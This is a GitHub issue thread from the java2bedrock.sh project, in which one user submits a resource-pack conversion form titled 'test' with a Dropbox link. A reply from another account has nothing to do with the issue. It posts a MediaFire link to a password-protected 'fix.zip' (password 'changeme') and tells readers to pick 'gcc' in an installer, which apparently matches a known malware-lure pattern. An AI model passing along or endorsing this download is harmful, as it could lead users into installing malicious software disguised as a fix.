### ISSUE TITLE
[Pack]: test

### ISSUE THREAD

**Issue by BittuBhagat55** [Kas-tle/java2bedrock.sh#33333]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/ienwhf9plaxbf7uvf7jc6/generated-1.zip?rlkey=622c2zxlfvna26d6df9v1z7uo&st=m5pucm15&dl=1

### Default Assets Version

None

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

true

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
